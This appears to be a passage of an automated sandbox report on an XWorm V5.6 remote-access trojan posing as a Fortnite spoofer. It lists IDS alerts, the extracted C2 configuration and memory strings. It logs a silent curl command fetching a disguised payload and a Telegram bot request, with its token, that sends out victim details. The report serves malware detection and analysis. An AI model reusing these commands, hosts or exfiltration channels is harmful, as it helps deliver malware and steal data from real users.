2024-11-23T21:06:42.797190+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:44.827208+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:46.503446+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:51.522127+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:06:52.270009+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:00.928713+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:02.376681+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:03.202099+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:05.084425+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:08.592033+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
2024-11-23T21:07:11.747248+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-11-23T21:03:32.015251+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:03:44.739529+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:03:57.818615+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:03:58.126970+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:10.894733+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:23.980400+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:31.739407+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:32.655876+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:36.985967+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:48.784656+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:49.285345+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:52.906436+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:54.489032+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:54.608635+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:54.728415+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:04:54.848808+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:00.439092+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:00.566683+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:00.730220+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:00.849831+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:03.842107+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:07.111881+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:07.310411+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:09.516554+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:12.594933+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:12.720220+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:12.941567+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:14.951464+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:26.894889+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:31.653759+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:38.716530+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:39.017669+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:39.265257+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:39.502159+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:39.986161+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:44.555068+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:49.604419+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:50.499487+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:50.700760+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:51.593221+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:05:55.860453+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:00.704112+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:00.904480+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:01.903762+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:02.491826+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:15.396263+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:16.228275+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:16.457196+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:16.624665+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:29.190148+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:34.570564+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:42.806358+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:44.832141+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:46.631866+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:51.526216+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:06:52.273835+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:07:00.932230+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:07:02.382413+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:07:03.206395+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:07:08.595658+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            2024-11-23T21:07:11.749735+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-11-23T21:03:35.005493+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:04:05.021284+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:04:35.036903+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:05:05.053094+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:05:35.069157+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:06:05.390110+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:06:35.084989+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            2024-11-23T21:07:05.084425+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.198.168.179 | 1337 | 192.168.2.7 | 49711 | TCP
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-11-23T21:05:31.287399+0100 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49711 | 104.198.168.179 | 1337 | TCP


                            AV Detection

                            Source: https://r2.hypixel.cfd/svchost.exe | Avira URL Cloud: Label: malware
                            Source: C:\Windows\StartMenuExperienceHost.exe | Avira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Avira: detection malicious, Label: TR/Spy.Gen
                            Source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | ReversingLabs: Detection: 87%
                            Source: C:\Windows\StartMenuExperienceHost.exe | ReversingLabs: Detection: 87%
                            Source: 18sFhgSyVK.exe | ReversingLabs: Detection: 23%
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
                            Source: C:\Windows\StartMenuExperienceHost.exe | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Joe Sandbox ML: detected
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: 127.0.0.1,104.198.168.179
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: 1337
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: <123456789>
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: <Xwormmm>
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: XWorm V5.6
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: USB.exe
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: %Temp%
                            Source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack | String decryptor: svchost.exe
                            Source: unknown | HTTPS traffic detected: 172.66.0.158:443 -> 192.168.2.7:49701 version: TLS 1.2
                            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49704 version: TLS 1.2
                            Source: 18sFhgSyVK.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb&& source: 18sFhgSyVK.exe
                            Source: Binary string: C:\Users\zinc\Desktop\Fortnite-Perm-Spoofer-main\x64\Release\spoofer.pdb source: 18sFhgSyVK.exe

                            Networking

                            Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.198.168.179:1337 -> 192.168.2.7:49711
                            Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.198.168.179:1337 -> 192.168.2.7:49711
                            Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49704 -> 149.154.167.220:443
                            Source: Malware configuration extractor | URLs: 127.0.0.1
                            Source: Malware configuration extractor | URLs: 104.198.168.179
                            Source: unknown | DNS query: name: api.telegram.org
                            Source: Yara match | File source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
                            Source: Yara match | File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
                            Source: global traffic | TCP traffic: 192.168.2.7:49711 -> 104.198.168.179:1337
                            Source: global traffic | HTTP traffic detected: GET /botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                            Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknown | DNS query: name: ip-api.com
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
                            Source: unknown | TCP traffic detected without corresponding DNS query: 104.198.168.179
                            Source: global traffic | HTTP traffic detected: GET /svchost.exe HTTP/1.1 | Host: r2.hypixel.cfd | User-Agent: curl/7.83.1 | Accept: */*
                            Source: global traffic | DNS traffic detected: DNS query: r2.hypixel.cfd
                            Source: global traffic | DNS traffic detected: DNS query: time.windows.com
                            Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Sat, 23 Nov 2024 20:03:15 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: svchost.exe, 00000005.00000002.1365183174.00000135A5613000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.dr | String found in binary or memory: https://api.telegram.org/bot
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 00000005.00000002.1365379718.00000135A5670000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364372315.00000135A566E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                            Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                            Source: svchost.exe, 00000005.00000003.1364326636.00000135A5675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                            Source: svchost.exe, 00000005.00000003.1364634617.00000135A5659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                            Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
                            Source: svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365335517.00000135A5662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364494177.00000135A5661000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                            Source: svchost.exe, 00000005.00000003.1364672742.00000135A5641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                            Source: svchost.exe, 00000005.00000002.1365401513.00000135A5677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365241422.00000135A5642000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
                            Source: svchost.exe, 00000005.00000002.1365286855.00000135A5658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1364694591.00000135A5657000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                            Source: svchost.exe, 00000005.00000003.1264082877.00000135A5636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 00000005.00000003.1364473650.00000135A5667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365214692.00000135A562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1365357745.00000135A5668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
